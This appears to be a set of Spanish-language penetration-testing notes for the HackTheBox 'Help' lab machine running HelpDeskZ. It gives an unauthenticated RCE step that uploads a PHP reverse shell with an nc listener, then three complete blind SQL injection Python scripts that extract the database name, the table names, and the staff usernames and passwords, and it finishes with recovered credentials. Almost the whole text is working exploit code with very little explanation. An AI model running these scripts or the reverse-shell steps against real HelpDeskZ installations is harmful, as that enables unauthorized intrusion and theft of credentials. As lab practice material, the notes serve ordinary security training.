HelpDeskZ
Versión:
http://help.htb/support/readme.html
RCE sin autenticar
searchsploit HelpDeskZ
~/.pyenv/versions/2.7.18/bin/python 40300.py http://help.htb/support/uploads/tickets/ rev_shell.php
nc -lvnp 4444
SQLi autenticado
Extraer nombre de la base de datos
#!/usr/bin/env python3
from pwn import *
import requests, sys, signal, time, pdb, urllib3
from urllib.parse import quote
def sig_handler(sig, frame):
print("\n\n[!] Saliendo...\n")
sys.exit(1)
signal.signal(signal.SIGINT, sig_handler)
#Variables Globales
characters= string.ascii_lowercase + string.ascii_uppercase + string.digits + '_'
Cookie= {"usrhash":"0Nwx5jIdx%2BP2QcbUIv9qck4Tk2feEu8Z0J7rPe0d70BtNMpqfrbvecJupGimitjg3JjP1UzkqYH6QdYSl1tVZNcjd4B7yFeh6KDrQQ%2FiYFsjV6wVnLIF%2FaNh6SC24eT5OqECJlQEv7G47Kd65yVLoZ06smnKha9AGF4yL2Ylo%2BE3IrjgqzGu%2BU2KAyaJPiVy97oC5vrSOyyszlYc1LNlNw%3D%3D"}
proxies = {"http": "http://127.0.0.1:8080"}
def makeSQLI():
s=requests.session()
s.verify = False
p1= log.progress("Fuerza Bruta")
p1.status("Iniciando proceso de fuerza bruta")
time.sleep(2)
p2= log.progress("Database")
database= ""
for position in range(1,8): #Rango 1 - (tamaño database + 1)
for character in characters:
payload = f" AND ((substr((select database()),{position},1))='{character}') -- -"
p1.status(payload)
url= "http://help.htb/support/?v=view_tickets&action=ticket¶m[]=4¶m[]=attachment¶m[]=1¶m[]=6" + payload
url = quote(url, safe=':/?&=.,')
r = s.get(url,cookies=Cookie,allow_redirects=False)
if not "helpdesk" in r.text:
database += character
p2.status(database)
break
if __name__ == '__main__':
makeSQLI()
Extraer nombres de las tablas
#!/usr/bin/env python3
from pwn import *
import requests, sys, signal, time, pdb, urllib3
from urllib.parse import quote
def sig_handler(sig, frame):
print("\n\n[!] Saliendo...\n")
sys.exit(1)
signal.signal(signal.SIGINT, sig_handler)
#Variables Globales
characters= string.ascii_lowercase + string.ascii_uppercase + string.digits + '_'
Cookie= {"usrhash":"0Nwx5jIdx%2BP2QcbUIv9qck4Tk2feEu8Z0J7rPe0d70BtNMpqfrbvecJupGimitjg3JjP1UzkqYH6QdYSl1tVZNcjd4B7yFeh6KDrQQ%2FiYFsjV6wVnLIF%2FaNh6SC24eT5OqECJlQEv7G47Kd65yVLoZ06smnKha9AGF4yL2Ylo%2BE3IrjgqzGu%2BU2KAyaJPiVy97oC5vrSOyyszlYc1LNlNw%3D%3D"}
proxies = {"http": "http://127.0.0.1:8080"}
def makeSQLI():
s=requests.session()
s.verify = False
p1= log.progress("Fuerza Bruta")
p1.status("Iniciando proceso de fuerza bruta")
time.sleep(2)
numChars = 0
p2= log.progress("Tables")
table_name= ""
for table in range(0,5):
for position in range(1,15): #Rango 1 - (tamaño database + 1)
for character in characters:
payload = f" AND (substr((select table_name from information_schema.tables where table_schema=database() limit {table},1) ,{position},1)='{character}') -- -"
p1.status(payload)
url= "http://help.htb/support/?v=view_tickets&action=ticket¶m[]=4¶m[]=attachment¶m[]=1¶m[]=6" + payload
url = quote(url, safe=':/?&=.,')
r = s.get(url,cookies=Cookie,allow_redirects=False)
if not "helpdesk" in r.text:
table_name += character
p2.status(table_name)
break
else:
numChars+= 1
if numChars == len(characters):
break
table_name += ", "
if __name__ == '__main__':
makeSQLI()
Extraer contenido
#!/usr/bin/env python3
from pwn import *
import requests, sys, signal, time, pdb, urllib3
from urllib.parse import quote
def sig_handler(sig, frame):
print("\n\n[!] Saliendo...\n")
sys.exit(1)
signal.signal(signal.SIGINT, sig_handler)
#Variables Globales
characters= string.ascii_lowercase + string.ascii_uppercase + string.digits + '_' + ':'
Cookie= {"usrhash":"0Nwx5jIdx%2BP2QcbUIv9qck4Tk2feEu8Z0J7rPe0d70BtNMpqfrbvecJupGimitjg3JjP1UzkqYH6QdYSl1tVZNcjd4B7yFeh6KDrQQ%2FiYFsjV6wVnLIF%2FaNh6SC24eT5OqECJlQEv7G47Kd65yVLoZ06smnKha9AGF4yL2Ylo%2BE3IrjgqzGu%2BU2KAyaJPiVy97oC5vrSOyyszlYc1LNlNw%3D%3D"}
proxies = {"http": "http://127.0.0.1:8080"}
def makeSQLI():
s=requests.session()
s.verify = False
p1= log.progress("Fuerza Bruta")
p1.status("Iniciando proceso de fuerza bruta")
time.sleep(2)
p2= log.progress("Data")
data= ""
for position in range(1,50): #Rango 1 - (tamaño database + 1)
for character in characters:
payload = f" AND (substr((select group_concat(username,0x3A,password) from staff) ,{position},1)='{character}') -- -"
p1.status(payload)
url= "http://help.htb/support/?v=view_tickets&action=ticket¶m[]=4¶m[]=attachment¶m[]=1¶m[]=6" + payload
url = quote(url, safe=':/?&=.,')
r = s.get(url,cookies=Cookie,allow_redirects=False)
if not "helpdesk" in r.text:
data += character
p2.status(data)
break
data += ", "
if __name__ == '__main__':
makeSQLI()
admin \ Welcome1